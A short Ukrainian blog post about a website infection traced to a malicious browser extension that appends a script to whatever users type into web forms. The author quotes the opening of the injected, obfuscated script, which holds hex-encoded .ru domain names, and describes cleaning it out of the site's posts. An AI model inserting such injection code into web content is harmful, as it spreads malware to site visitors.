ІнтернетСайти

Шкідливі скрипти, які поширює розширення браузера (вірус на сайті)

Днями зіткнувся з новою заразою, яка поширює шкідливий код сайтами, перебуваючи при цьому в плагіні браузера! До мене звернулася людина з проханням знешкодити вірус на своєму сайті. Вона зрозуміла, що сайт заражений, коли почав спрацьовувати антивірус, не дозволяючи відкрити сторінку. Але найцікавішим виявилося те, як цей шкідливий код потрапив на сайт.

Відкривши вихідний код сторінки, я побачив такий код (наводжу лише його початок):

<script >// < ! [ CDATA [
window.a1336404323 = 1;!function(){var o=JSON.parse('["616c396c323335676b6337642e7275","6e796b7a323871767263646b742e7275"]')

Пошукавши його фрагменти у файлах, я нічого не знайшов. Виявилося, що цей код просто додано до тексту самих записів на деяких сторінках сайту, а подекуди навіть по кілька разів. Я очистив сайт від нього, просто почистивши записи, але як же він туди потрапив? Пошукавши частини коду в Google, з’ясував, що інтернет рясніє такими записами на форумах, дошках оголошень, у коментарях тощо. Тобто код завжди додається до тексту, який людина набирає в полях введення. Також я знайшов згадки, що цим неподобством займається один зі шкідливих плагінів, і це розставляє все на свої місця.

Залишити коментар

Вашу електронну адресу не буде оприлюднено. Обов’язкові поля позначено *